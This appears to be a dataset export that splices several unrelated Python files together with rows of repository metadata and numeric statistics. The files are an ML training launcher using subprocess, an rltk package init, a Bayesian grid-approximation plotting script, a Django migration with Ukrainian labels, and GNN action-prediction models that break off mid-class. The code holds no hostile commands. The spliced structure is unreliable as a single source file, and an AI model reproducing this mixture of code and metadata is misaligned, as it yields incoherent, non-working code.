process = subprocess.Popen(command, shell=True)
process.wait()"""
def run(command):
    """Launch a shell command and block until it finishes."""
    process = subprocess.Popen(command, shell=True)
    process.wait()


seeds = [1, 2, 3, 4, 5]
for seed in seeds:
    # pre-train
    run(f'python main_sequence_lm.py --lang java --n_epochs 5 --data code --model transformer --seed {seed} --save_model')
    run(f'python main_sequence_lm.py --lang java --n_epochs 5 --data desc --model transformer --seed {seed} --save_model')
    run(f'python main_sequence_lm.py --lang 6L-java --n_epochs 5 --data code --model transformer --seed {seed} --save_model')
    run(f'python main_sequence_lm.py --lang 6L-java --n_epochs 5 --data desc --model transformer --seed {seed} --save_model')
    run(f'python main_sequence_lm.py --lang 5L-java --n_epochs 5 --data code --model transformer --seed {seed} --save_model')
    run(f'python main_sequence_lm.py --lang 5L-java --n_epochs 5 --data desc --model transformer --seed {seed} --save_model')

    # random init
    run(f'python main_code_retrieval.py --lang java --model transformer --seed {seed}')
    run(f'python main_code_retrieval.py --lang 6L-java --model transformer --seed {seed}')
    run(f'python main_code_retrieval.py --lang 5L-java --model transformer --seed {seed}')
    run(f'python main_method_prediction.py --lang java --model transformer --seed {seed}')
    run(f'python main_method_prediction.py --lang 6L-java --model transformer --seed {seed}')
    run(f'python main_method_prediction.py --lang 5L-java --model transformer --seed {seed}')

    # fine tune
    run(f'python main_code_retrieval.py --lang java --model transformer --seed {seed} --load')
    run(f'python main_code_retrieval.py --lang 6L-java --model transformer --seed {seed} --load')
    run(f'python main_code_retrieval.py --lang 5L-java --model transformer --seed {seed} --load')
    run(f'python main_method_prediction.py --lang java --model transformer --seed {seed} --load')
    run(f'python main_method_prediction.py --lang 6L-java --model transformer --seed {seed} --load')
    run(f'python main_method_prediction.py --lang 5L-java --model transformer --seed {seed} --load')
process.wait() | 42.699248 | 179 | 0.690086 | 839 | 5,679 | 4.563766 | 0.078665 | 0.056412 | 0.09872 | 0.204492 | 0.966571 | 0.966571 | 0.966049 | 0.966049 | 0.966049 | 0.966049 | 0 | 0.038961 | 0.159359 | 5,679 | 133 | 180 | 42.699248 | 0.763092 | 0.005107 | 0 | 0.62069 | 0 | 0.103448 | 0.489796 | 0.083407 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e380bf5410a99308efa07c33b512198c670f6e2 | 88 | py | Python | rltk/io/__init__.py | ckxz105/rltk | 2d08269002c00c0218421c8c2dc0cc7c4f677131 | [
"MIT"
] | 98 | 2017-03-07T22:59:41.000Z | 2022-02-02T16:10:40.000Z | rltk/io/__init__.py | ckxz105/rltk | 2d08269002c00c0218421c8c2dc0cc7c4f677131 | [
"MIT"
] | 26 | 2017-04-25T17:25:22.000Z | 2021-09-10T16:57:05.000Z | rltk/io/__init__.py | ckxz105/rltk | 2d08269002c00c0218421c8c2dc0cc7c4f677131 | [
"MIT"
] | 31 | 2017-03-09T22:40:40.000Z | 2022-03-11T16:28:23.000Z | from rltk.io.reader import *
from rltk.io.writer import *
from rltk.io.adapter import *
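These star re-exports flatten the reader, writer, and adapter submodules into the `rltk.io` namespace; which names actually leak through `import *` is governed by each submodule's `__all__` (or, absent that, all non-underscore names). A small self-contained illustration using a synthetic module:

```python
import sys
import types

# Build a throwaway module whose __all__ hides one of its two names.
mod = types.ModuleType("fake_reader")
mod.Reader = type("Reader", (), {})
mod._helper = object()            # private by convention
mod.__all__ = ["Reader"]          # only Reader survives `from fake_reader import *`
sys.modules["fake_reader"] = mod

# Perform the star import into a fresh namespace and see what arrived.
namespace = {}
exec("from fake_reader import *", namespace)
exported = sorted(k for k in namespace if not k.startswith("__"))
```

Defining `__all__` in each submodule is what keeps an `__init__.py` like this one from accidentally re-exporting private helpers.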
# File: ch2/2m2.py (repo: xSakix/bayesian_analyses, license: Apache-2.0)
import grid_approx
import matplotlib.pyplot as plt
import numpy as np
def make_priors(size):
    priors = np.random.uniform(0., 1., size)
    priors[priors < 0.5] = 0.
    priors[priors >= 0.5] = 1.
    if priors.sum() == 0.:
        return make_priors(size)
    priors.sort()  # ndarray.sort() sorts in place and returns None, so sort first...
    return priors  # ...then return the array itself
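A NumPy detail worth spelling out for this helper: `ndarray.sort()` works in place and returns `None`, while `np.sort` returns a sorted copy — so `return priors.sort()` would hand `None` back to the caller:

```python
import numpy as np

arr = np.array([3., 1., 2.])
copy_sorted = np.sort(arr)       # returns a new sorted array, arr untouched so far
in_place_result = arr.sort()     # sorts arr itself and returns None
```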
print(make_priors(10))
# for W
# 1
p_grid, posterior = grid_approx.compute(['W', 'W', 'W'], priors=make_priors(3))
plt.plot(p_grid, posterior, label='#1')
# 2
p_grid, posterior = grid_approx.compute(['W', 'W', 'W', 'L'], priors=make_priors(4))
plt.plot(p_grid, posterior, label='#2')
# 3
p_grid, posterior = grid_approx.compute(['L', 'W', 'W', 'L', 'W', 'W', 'W'], priors=make_priors(7))
plt.plot(p_grid, posterior, label='#3')
plt.xlabel('probability of W')
plt.ylabel('plausibility')
plt.legend()
plt.show()
plt.clf()
# for L
# 1
p_grid, posterior = grid_approx.compute(['W', 'W', 'W'], 'L', priors=make_priors(3))
plt.plot(p_grid, posterior, label='#1')
# 2
p_grid, posterior = grid_approx.compute(['W', 'W', 'W', 'L'], 'L', priors=make_priors(4))
plt.plot(p_grid, posterior, label='#2')
# 3
p_grid, posterior = grid_approx.compute(['L', 'W', 'W', 'L', 'W', 'W', 'W'], 'L', priors=make_priors(7))
plt.plot(p_grid, posterior, label='#3')
plt.xlabel('probability of L')
plt.ylabel('plausibility')
plt.legend()
plt.show()
# 4
for j in range(4):
    base = ['L', 'W', 'W', 'L', 'W', 'W', 'W']
    obs = list(base)
    for i in range(j * 10):
        obs.extend(base)  # repeat the base observations; obs.append(obs) would nest the list inside itself
p_grid, posterior = grid_approx.compute(obs, priors=make_priors(len(obs)))
plt.plot(p_grid, posterior, label='#' + str(len(obs)))
plt.xlabel('probability of W')
plt.ylabel('plausibility')
plt.legend()
plt.show()
# 4L
for j in range(4):
    base = ['L', 'W', 'W', 'L', 'W', 'W', 'W']
    obs = list(base)
    for i in range(j * 10):
        obs.extend(base)  # repeat the base observations; obs.append(obs) would nest the list inside itself
p_grid, posterior = grid_approx.compute(obs, 'L', priors=make_priors(len(obs)))
plt.plot(p_grid, posterior, label='#' + str(len(obs)))
plt.xlabel('probability of L')
plt.ylabel('plausibility')
plt.legend()
plt.show()
| 26.077922 | 104 | 0.625498 | 330 | 2,008 | 3.69697 | 0.160606 | 0.032787 | 0.183607 | 0.118033 | 0.82377 | 0.82377 | 0.82377 | 0.822951 | 0.822951 | 0.822951 | 0 | 0.021752 | 0.152888 | 2,008 | 76 | 105 | 26.421053 | 0.695473 | 0.013944 | 0 | 0.615385 | 0 | 0 | 0.087354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.057692 | 0 | 0.115385 | 0.019231 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28401076908ecc31b4783e099ddd1cbe624f0b97 | 6,822 | py | Python | pepdb/core/migrations/0088_auto_20160509_0247.py | dchaplinsky/pep.org.ua | 8633a65fb657d7f04dbdb12eb8ae705fa6be67e3 | [
"MIT"
] | 7 | 2015-12-21T03:52:46.000Z | 2020-07-24T19:17:23.000Z | pepdb/core/migrations/0088_auto_20160509_0247.py | dchaplinsky/pep.org.ua | 8633a65fb657d7f04dbdb12eb8ae705fa6be67e3 | [
"MIT"
] | 12 | 2016-03-05T18:11:05.000Z | 2021-06-17T20:20:03.000Z | pepdb/core/migrations/0088_auto_20160509_0247.py | dchaplinsky/pep.org.ua | 8633a65fb657d7f04dbdb12eb8ae705fa6be67e3 | [
"MIT"
] | 4 | 2016-07-17T20:19:38.000Z | 2021-03-23T12:47:20.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import redactor.fields
class Migration(migrations.Migration):
dependencies = [
('core', '0087_auto_20160419_0250'),
]
operations = [
migrations.CreateModel(
name='DeclarationExtra',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date_confirmed', models.DateField(db_index=True, null=True, verbose_name='\u0414\u0430\u0442\u0430', blank=True)),
('date_confirmed_details', models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')])),
('section', models.IntegerField(default=0, db_index=True, verbose_name='\u0420\u043e\u0437\u0434\u0456\u043b \u0434\u0435\u043a\u043b\u0430\u0440\u0430\u0446\u0456\u0457', choices=[(0, '\u0417\u0430\u0433\u0430\u043b\u044c\u043d\u0430 \u0441\u0443\u043c\u0430 \u0441\u0443\u043a\u0443\u043f\u043d\u043e\u0433\u043e \u0434\u043e\u0445\u043e\u0434\u0443, \u0433\u0440\u0438\u0432\u043d\u0456'), (1, '\u0414\u0430\u0440\u0443\u043d\u043a\u0438, \u043f\u0440\u0438\u0437\u0438, \u0432\u0438\u0433\u0440\u0430\u0448\u0456'), (2, '\u0417\u0435\u043c\u0435\u043b\u044c\u043d\u0456 \u0434\u0456\u043b\u044f\u043d\u043a\u0438'), (3, '\u0416\u0438\u0442\u043b\u043e\u0432\u0456 \u0431\u0443\u0434\u0438\u043d\u043a\u0438'), (4, '\u041a\u0432\u0430\u0440\u0442\u0438\u0440\u0438'), (5, '\u0406\u043d\u0448\u0435 \u043d\u0435\u0440\u0443\u0445\u043e\u043c\u0435 \u043c\u0430\u0439\u043d\u043e'), (6, '\u0422\u0440\u0430\u043d\u0441\u043f\u043e\u0440\u0442\u043d\u0456 \u0437\u0430\u0441\u043e\u0431\u0438'), (7, '\u0412\u043a\u043b\u0430\u0434\u0438 \u0443 \u0431\u0430\u043d\u043a\u0430\u0445'), (8, '\u0424\u0456\u043d\u0430\u043d\u0441\u043e\u0432\u0456 \u0437\u043e\u0431\u043e\u0432\u2019\u044f\u0437\u0430\u043d\u043d\u044f'), (9, '\u0406\u043d\u0448\u0456 \u0430\u043a\u0442\u0438\u0432\u0438')])),
('note', redactor.fields.RedactorField(verbose_name='\u0422\u0435\u043a\u0441\u0442')),
('address', redactor.fields.RedactorField(verbose_name='\u0410\u0434\u0440\u0435\u0441\u0430', blank=True)),
('country', models.ForeignKey(to='core.Country', blank=True)),
('person', models.ForeignKey(to='core.Person')),
],
options={
'verbose_name': '\u0414\u043e\u0434\u0430\u0442\u043a\u043e\u0432\u0430 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044f \u043f\u0440\u043e \u0441\u0442\u0430\u0442\u043a\u0438',
'verbose_name_plural': '\u0414\u043e\u0434\u0430\u0442\u043a\u043e\u0432\u0430 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044f \u043f\u0440\u043e \u0441\u0442\u0430\u0442\u043a\u0438',
},
),
migrations.AlterField(
model_name='company2company',
name='relationship_type',
field=models.CharField(blank=True, max_length=30, verbose_name="\u0422\u0438\u043f \u0437\u0432'\u044f\u0437\u043a\u0443", choices=[('\u0412\u043b\u0430\u0441\u043d\u0438\u043a', '\u0412\u043b\u0430\u0441\u043d\u0438\u043a'), ('\u0421\u043f\u0456\u0432\u0432\u043b\u0430\u0441\u043d\u0438\u043a', '\u0421\u043f\u0456\u0432\u0432\u043b\u0430\u0441\u043d\u0438\u043a'), ('\u0421\u043f\u043e\u0440\u0456\u0434\u043d\u0435\u043d\u0430', '\u0421\u043f\u043e\u0440\u0456\u0434\u043d\u0435\u043d\u0430'), ('\u0417\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a', '\u0417\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a'), ('\u0421\u043f\u0456\u0432\u0437\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a', '\u0421\u043f\u0456\u0432\u0437\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a'), ('\u041a\u0440\u0435\u0434\u0438\u0442\u043e\u0440 (\u0444\u0456\u043d\u0430\u043d\u0441\u043e\u0432\u0438\u0439 \u043f\u0430\u0440\u0442\u043d\u0435\u0440)', '\u041a\u0440\u0435\u0434\u0438\u0442\u043e\u0440 (\u0444\u0456\u043d\u0430\u043d\u0441\u043e\u0432\u0438\u0439 \u043f\u0430\u0440\u0442\u043d\u0435\u0440)'), ('\u041d\u0430\u0434\u0430\u0432\u0430\u0447 \u043f\u0440\u043e\u0444\u0435\u0441\u0456\u0439\u043d\u0438\u0445 \u043f\u043e\u0441\u043b\u0443\u0433', '\u041d\u0430\u0434\u0430\u0432\u0430\u0447 \u043f\u0440\u043e\u0444\u0435\u0441\u0456\u0439\u043d\u0438\u0445 \u043f\u043e\u0441\u043b\u0443\u0433'), ('\u041a\u043b\u0456\u0454\u043d\u0442', '\u041a\u043b\u0456\u0454\u043d\u0442'), ('\u0412\u0438\u043a\u043e\u043d\u0430\u0432\u0435\u0446\u044c', '\u0412\u0438\u043a\u043e\u043d\u0430\u0432\u0435\u0446\u044c'), ('\u0417\u0430\u043c\u043e\u0432\u043d\u0438\u043a', '\u0417\u0430\u043c\u043e\u0432\u043d\u0438\u043a'), ('\u041f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a', '\u041f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a'), ('\u0421\u0443\u0431\u043f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a', '\u0421\u0443\u0431\u043f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a'), 
('\u041f\u043e\u0441\u0442\u0430\u0447\u0430\u043b\u044c\u043d\u0438\u043a', '\u041f\u043e\u0441\u0442\u0430\u0447\u0430\u043b\u044c\u043d\u0438\u043a'), ('\u041e\u0440\u0435\u043d\u0434\u0430\u0440', '\u041e\u0440\u0435\u043d\u0434\u0430\u0440'), ('\u041e\u0440\u0435\u043d\u0434\u043e\u0434\u0430\u0432\u0435\u0446\u044c', '\u041e\u0440\u0435\u043d\u0434\u043e\u0434\u0430\u0432\u0435\u0446\u044c'), ('\u041a\u043e\u043d\u0442\u0440\u0430\u0433\u0435\u043d\u0442', '\u041a\u043e\u043d\u0442\u0440\u0430\u0433\u0435\u043d\u0442'), ('\u041f\u0440\u0430\u0432\u043e\u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0438\u043a', '\u041f\u0440\u0430\u0432\u043e\u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0438\u043a'), ('\u041f\u0440\u0430\u0432\u043e\u0432\u043b\u0430\u0441\u043d\u0438\u043a', '\u041f\u0440\u0430\u0432\u043e\u0432\u043b\u0430\u0441\u043d\u0438\u043a'), ('\u041c\u0430\u0442\u0435\u0440\u0438\u043d\u0441\u044c\u043a\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f', '\u041c\u0430\u0442\u0435\u0440\u0438\u043d\u0441\u044c\u043a\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f'), ('\u0414\u043e\u0447\u0456\u0440\u043d\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f', '\u0414\u043e\u0447\u0456\u0440\u043d\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0456\u044f'), ('\u0427\u043b\u0435\u043d \u043d\u0430\u0433\u043b\u044f\u0434\u043e\u0432\u043e\u0433\u043e \u043e\u0440\u0433\u0430\u043d\u0443)', '\u0427\u043b\u0435\u043d \u043d\u0430\u0433\u043b\u044f\u0434\u043e\u0432\u043e\u0433\u043e \u043e\u0440\u0433\u0430\u043d\u0443)')]),
),
]
| 179.526316 | 3,569 | 0.735855 | 979 | 6,822 | 5.099081 | 0.122574 | 0.044071 | 0.060096 | 0.028045 | 0.611178 | 0.595954 | 0.583934 | 0.56891 | 0.555889 | 0.545873 | 0 | 0.48236 | 0.073439 | 6,822 | 37 | 3,570 | 184.378378 | 0.307388 | 0.003078 | 0 | 0.064516 | 0 | 1.16129 | 0.771437 | 0.72643 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.096774 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2862401fb1161e467c808fad23b4a2967ee94915 | 51,486 | py | Python | src/GNN/action_models.py | reail-iitd/commonsense-task-planning | 6a6d1599bcad2e4ee11d5d07bf4262a8255caad0 | [
"BSD-2-Clause"
] | 10 | 2020-07-05T19:53:31.000Z | 2022-02-28T08:17:56.000Z | src/GNN/action_models.py | reail-iitd/commonsense-task-planning | 6a6d1599bcad2e4ee11d5d07bf4262a8255caad0 | [
"BSD-2-Clause"
] | 3 | 2021-06-08T21:49:50.000Z | 2022-03-12T00:35:54.000Z | src/GNN/action_models.py | reail-iitd/commonsense-task-planning | 6a6d1599bcad2e4ee11d5d07bf4262a8255caad0 | [
"BSD-2-Clause"
] | 4 | 2020-09-29T15:36:31.000Z | 2021-08-10T14:50:41.000Z | from src.GNN.helper import *
from src.GNN.CONSTANTS import *
from src.utils import *
from src.GNN.oldmodels import *
torch.manual_seed(1)
# Contains the action prediction task models. Will be released in a future publication.
def action2vec(action, num_objects, num_states):
    actionArray = torch.zeros(len(possibleActions))
    actionArray[possibleActions.index(action['name'])] = 1
    predicate1 = torch.zeros(num_objects+1)
    # predicates 2 and 3 will be predicted together
    predicate2 = torch.zeros(num_objects+1)
    predicate3 = torch.zeros(num_states)
    if len(action['args']) == 0:
        predicate1[-1] = 1
        predicate2[-1] = 1
    elif len(action['args']) == 1:
        predicate1[object2idx[action['args'][0]]] = 1
        predicate2[-1] = 1
    else:
        # action['args'][1] can be a state or an object
        if action['args'][1] in object2idx:
            predicate1[object2idx[action['args'][0]]] = 1
            predicate2[object2idx[action['args'][1]]] = 1
        else:
            predicate1[object2idx[action['args'][0]]] = 1
            predicate3[possibleStates.index(action['args'][1])] = 1
    return torch.cat((actionArray, predicate1, predicate2, predicate3), 0)
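The one-hot layout produced above can be illustrated with a self-contained sketch. The vocabularies below (`possible_actions`, `possible_states`, `object2idx`) are placeholders, not the real ones from `src/GNN/CONSTANTS`:

```python
# Minimal illustration of the action-vector layout:
# [action one-hot | predicate1 (objects + "none") | predicate2 (objects + "none") | state]
possible_actions = ['moveTo', 'pick', 'changeState']   # placeholder vocabulary
possible_states = ['open', 'closed']                   # placeholder vocabulary
object2idx = {'fridge': 0, 'cup': 1}                   # placeholder vocabulary
num_objects, num_states = len(object2idx), len(possible_states)

def encode(action):
    vec = [0.0] * (len(possible_actions) + 2 * (num_objects + 1) + num_states)
    vec[possible_actions.index(action['name'])] = 1.0
    base1 = len(possible_actions)        # start of predicate-1 block
    base2 = base1 + num_objects + 1      # start of predicate-2 block
    base3 = base2 + num_objects + 1      # start of state block
    args = action['args']
    if not args:
        vec[base1 + num_objects] = 1.0   # "no object" slot
        vec[base2 + num_objects] = 1.0
    elif len(args) == 1:
        vec[base1 + object2idx[args[0]]] = 1.0
        vec[base2 + num_objects] = 1.0
    elif args[1] in object2idx:
        vec[base1 + object2idx[args[0]]] = 1.0
        vec[base2 + object2idx[args[1]]] = 1.0
    else:
        vec[base1 + object2idx[args[0]]] = 1.0
        vec[base3 + possible_states.index(args[1])] = 1.0
    return vec

v = encode({'name': 'changeState', 'args': ['fridge', 'open']})
print(len(v))  # 3 actions + (2+1) + (2+1) + 2 states = 11
```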
def action2ids(action, num_objects, num_states):
    actionID = possibleActions.index(action['name'])
    predicate1, predicate2 = 0, 0
    if len(action['args']) == 0:
        predicate1 = num_objects+1
        predicate2 = num_objects+1
    elif len(action['args']) == 1:
        predicate1 = object2idx[action['args'][0]]
        predicate2 = num_objects+1
    else:
        # action['args'][1] can be a state or an object
        if action['args'][1] in object2idx:
            predicate1 = object2idx[action['args'][0]]
            predicate2 = object2idx[action['args'][1]]
        else:
            predicate1 = object2idx[action['args'][0]]
            predicate2 = num_objects + 1 + possibleStates.index(action['args'][1])
    return actionID, predicate1, predicate2
def vec2action(vec, num_objects, num_states, idx2object):
    ret_action = {}
    action_array = list(vec[:len(possibleActions)])
    ret_action["name"] = possibleActions[action_array.index(max(action_array))]
    ret_action["args"] = []
    object1_array = list(vec[len(possibleActions):len(possibleActions)+num_objects+1])
    object1_ind = object1_array.index(max(object1_array))
    if object1_ind == len(object1_array) - 1:
        return ret_action
    else:
        ret_action["args"].append(idx2object[object1_ind])
    object2_or_state_array = list(vec[len(possibleActions)+num_objects+1:])
    object2_or_state_ind = object2_or_state_array.index(max(object2_or_state_array))
    if (object2_or_state_ind < num_objects):
        ret_action["args"].append(idx2object[object2_or_state_ind])
    elif (object2_or_state_ind == num_objects):
        pass
    else:
        ret_action["args"].append(possibleStates[object2_or_state_ind - num_objects - 1])
    return ret_action
def vec2action_grammatical(vec, num_objects, num_states, idx2object):
    ret_action = {}
    action_array = list(vec[:len(possibleActions)])
    ret_action["name"] = possibleActions[action_array.index(max(action_array))]
    ret_action["args"] = []
    object1_array = list(vec[len(possibleActions):len(possibleActions)+num_objects+1])
    object1_ind = object1_array.index(max(object1_array))
    if object1_ind == len(object1_array) - 1:
        # Removing the case in which zero objects are predicted
        object1_array = list(vec[len(possibleActions):len(possibleActions)+num_objects])
        object1_ind = object1_array.index(max(object1_array))
        ret_action["args"].append(idx2object[object1_ind])
    else:
        ret_action["args"].append(idx2object[object1_ind])
    if ret_action["name"] in ["moveTo", "pick", "climbUp", "climbDown", "clean"]:
        return ret_action
    object2_array = list(vec[len(possibleActions)+num_objects+1:len(possibleActions)+num_objects+1+num_objects])
    state_array = list(vec[len(possibleActions)+num_objects+1+num_objects+1:])
    assert len(state_array) == len(possibleStates)
    if ret_action["name"] == "changeState":
        ret_action["args"].append(possibleStates[state_array.index(max(state_array))])
    else:
        ret_action["args"].append(idx2object[object2_array.index(max(object2_array))])
    return ret_action
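The grammar constraint enforced by `vec2action_grammatical` (single-argument actions stop after the first object, `changeState` takes a state, every other two-argument action takes a second object) can be summarised as a small schema. The table is read directly off the branches above; any action name not listed is assumed to take two objects:

```python
# Argument schema implied by vec2action_grammatical's branches.
ACTION_ARITY = {
    'moveTo':      ('object',),
    'pick':        ('object',),
    'climbUp':     ('object',),
    'climbDown':   ('object',),
    'clean':       ('object',),
    'changeState': ('object', 'state'),
    # any other action name: ('object', 'object')
}

def expected_args(name):
    return ACTION_ARITY.get(name, ('object', 'object'))

assert expected_args('changeState') == ('object', 'state')
assert expected_args('pick') == ('object',)
```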
def tool2object_likelihoods(num_objects, tool_likelihoods):
    object_likelihoods = torch.zeros(num_objects)
    for i, tool in enumerate(TOOLS2):
        object_likelihoods[object2idx[tool]] = tool_likelihoods[i]
    return object_likelihoods
#############################################################################
class DGL_AGCN_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(DGL_AGCN_Action, self).__init__()
        self.name = "GatedHeteroRGCN_Attention_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Linear(n_hidden + n_hidden, 1)
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects+1)
        self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
        self.activation = nn.LeakyReLU()

    def forward(self, g, goalVec, goalObjectsVec):
        h = g.ndata['feat']
        for i, layer in enumerate(self.layers):
            h = layer(g, h)
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        attn_embedding = torch.cat([h, goalObjectsVec.repeat(h.size(0)).view(h.size(0), -1)], 1)
        attn_weights = F.softmax(self.attention(attn_embedding), dim=0)
        scene_embedding = torch.mm(attn_weights.t(), h)
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()
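The goal-conditioned attention pooling inside `forward` (concatenate the goal embedding onto every node, score, softmax over nodes, weighted-sum into a scene embedding) can be sketched shape-for-shape in plain NumPy; `w_attn` below is a random stand-in for the learned `self.attention` layer:

```python
import numpy as np

rng = np.random.default_rng(0)
n_nodes, n_hidden = 5, 8

h = rng.standard_normal((n_nodes, n_hidden))   # node embeddings after the GCN layers
goal = rng.standard_normal(n_hidden)           # embedded goal-objects vector
w_attn = rng.standard_normal(2 * n_hidden)     # stand-in for the learned attention layer

# Score each node against the goal, then softmax over the node dimension
# (dim=0 in the model).
attn_in = np.concatenate([h, np.tile(goal, (n_nodes, 1))], axis=1)
scores = attn_in @ w_attn
weights = np.exp(scores - scores.max())
weights /= weights.sum()

# Scene embedding: attention-weighted sum of node embeddings, shape (n_hidden,).
scene = weights @ h
assert scene.shape == (n_hidden,)
assert abs(weights.sum() - 1.0) < 1e-9
```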
class GGCN_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_Action, self).__init__()
        self.name = "GGCN_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Linear(n_hidden + n_hidden, 1)
        self.embed = nn.Linear(PRETRAINED_VECTOR_SIZE, n_hidden)
        self.fc1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.fc2 = nn.Linear(n_hidden, n_hidden)
        self.fc3 = nn.Linear(n_hidden, len(possibleActions))
        self.p1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.p2 = nn.Linear(n_hidden, n_hidden)
        self.p3 = nn.Linear(n_hidden, n_objects+1)
        self.q1 = nn.Linear(n_hidden + n_hidden, n_hidden)
        self.q2 = nn.Linear(n_hidden, n_hidden)
        self.q3 = nn.Linear(n_hidden, n_objects+1+n_states)
        self.activation = nn.LeakyReLU()

    def forward(self, g, goalVec, goalObjectsVec):
        h = g.ndata['feat']
        for i, layer in enumerate(self.layers):
            h = layer(g, h)
        goalObjectsVec = self.activation(self.embed(torch.Tensor(goalObjectsVec)))
        scene_embedding = torch.sum(h, dim=0).view(1, -1)
        goal_embed = self.activation(self.embed(torch.Tensor(goalVec.reshape(1, -1))))
        final_to_decode = torch.cat([scene_embedding, goal_embed], 1)
        action = self.activation(self.fc1(final_to_decode))
        action = self.activation(self.fc2(action))
        action = self.activation(self.fc3(action))
        action = F.softmax(action, dim=1)
        pred1 = self.activation(self.p1(final_to_decode))
        pred1 = self.activation(self.p2(pred1))
        pred1 = F.softmax(self.activation(self.p3(pred1)), dim=1)
        pred2 = self.activation(self.q1(final_to_decode))
        pred2 = self.activation(self.q2(pred2))
        pred2 = F.softmax(self.activation(self.q3(pred2)), dim=1)
        return torch.cat((action, pred1, pred2), 1).flatten()
class GGCN_metric_Action(nn.Module):
    def __init__(self,
                 in_feats,
                 n_objects,
                 n_hidden,
                 n_states,
                 n_layers,
                 etypes,
                 activation,
                 dropout):
        super(GGCN_metric_Action, self).__init__()
        self.name = "GGCN_metric_Action_" + str(n_hidden) + "_" + str(n_layers)
        self.layers = nn.ModuleList()
        self.layers.append(GatedHeteroRGCNLayer(in_feats, n_hidden, etypes, activation=activation))
        for i in range(n_layers - 1):
            self.layers.append(GatedHeteroRGCNLayer(n_hidden, n_hidden, etypes, activation=activation))
        self.attention = nn.Linear(n_hidden + n_hidden, 1)
